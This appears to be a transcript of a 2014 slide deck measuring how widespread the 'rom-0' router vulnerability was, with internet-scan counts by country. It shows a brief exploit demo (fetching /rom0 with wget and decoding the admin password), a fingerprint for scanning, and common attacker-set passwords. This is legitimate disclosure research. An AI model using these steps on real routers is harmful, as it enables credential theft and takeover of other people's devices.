impact of "rom-0" vulnerability
TRANSCRIPT
![Page 2: Impact of "rom-0" vulnerability](https://reader031.vdocument.in/reader031/viewer/2022020301/5874bf281a28ab0c6e8bdf9d/html5/thumbnails/2.jpg)
“rom-0” vulnerability
$ wget http://192.168.1.1/rom0
Connecting to 192.168.1.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16384 (16K) [application/octetstream]
20140520 16:58:18 (138 KB/s) ‘rom0’ saved [16384/16384]
$ ./RomDecoder rom0
password: SuperSecretPassword
![Page 3: Impact of "rom-0" vulnerability](https://reader031.vdocument.in/reader031/viewer/2022020301/5874bf281a28ab0c6e8bdf9d/html5/thumbnails/3.jpg)
Which one is vulnerable ?
![Page 4: Impact of "rom-0" vulnerability](https://reader031.vdocument.in/reader031/viewer/2022020301/5874bf281a28ab0c6e8bdf9d/html5/thumbnails/4.jpg)
Which one is vulnerable ?
● Web based test
● http://rom-0.cz
● Scan of the Internet: HTTP HEAD /rom-0
● Recognition:
● Status code: 200● Content-length: 16384
![Page 5: Impact of "rom-0" vulnerability](https://reader031.vdocument.in/reader031/viewer/2022020301/5874bf281a28ab0c6e8bdf9d/html5/thumbnails/5.jpg)
Results (May 2014)
● First scan: May 17-18 2014
● ~71M HTTP servers tested
● 1 219 985 vulnerable
● Czech Republic: 5 368
● Top in EU: Italy (116 731), Poland (22 702)
● Top in the world: Thailand (167 505), Columbia (139 976)
![Page 6: Impact of "rom-0" vulnerability](https://reader031.vdocument.in/reader031/viewer/2022020301/5874bf281a28ab0c6e8bdf9d/html5/thumbnails/6.jpg)
![Page 7: Impact of "rom-0" vulnerability](https://reader031.vdocument.in/reader031/viewer/2022020301/5874bf281a28ab0c6e8bdf9d/html5/thumbnails/7.jpg)
![Page 8: Impact of "rom-0" vulnerability](https://reader031.vdocument.in/reader031/viewer/2022020301/5874bf281a28ab0c6e8bdf9d/html5/thumbnails/8.jpg)
Analysis
● How many are really vulnerable: Over 90%
● Already hacked: At least 30% (but likely all of them)
● Most common passwords:
● PortablePwned● ][p}{P][p---● .corporacion● 263297
![Page 9: Impact of "rom-0" vulnerability](https://reader031.vdocument.in/reader031/viewer/2022020301/5874bf281a28ab0c6e8bdf9d/html5/thumbnails/9.jpg)
World map (05-10/2014)
![Page 10: Impact of "rom-0" vulnerability](https://reader031.vdocument.in/reader031/viewer/2022020301/5874bf281a28ab0c6e8bdf9d/html5/thumbnails/10.jpg)
Thailand (no. 1; 100% = 167505)
![Page 11: Impact of "rom-0" vulnerability](https://reader031.vdocument.in/reader031/viewer/2022020301/5874bf281a28ab0c6e8bdf9d/html5/thumbnails/11.jpg)
Colombia (no. 2; 100% = 139976)
![Page 12: Impact of "rom-0" vulnerability](https://reader031.vdocument.in/reader031/viewer/2022020301/5874bf281a28ab0c6e8bdf9d/html5/thumbnails/12.jpg)
Italy (no. 3; 100% = 116731)
![Page 13: Impact of "rom-0" vulnerability](https://reader031.vdocument.in/reader031/viewer/2022020301/5874bf281a28ab0c6e8bdf9d/html5/thumbnails/13.jpg)
Czech Republic (100% = 5368)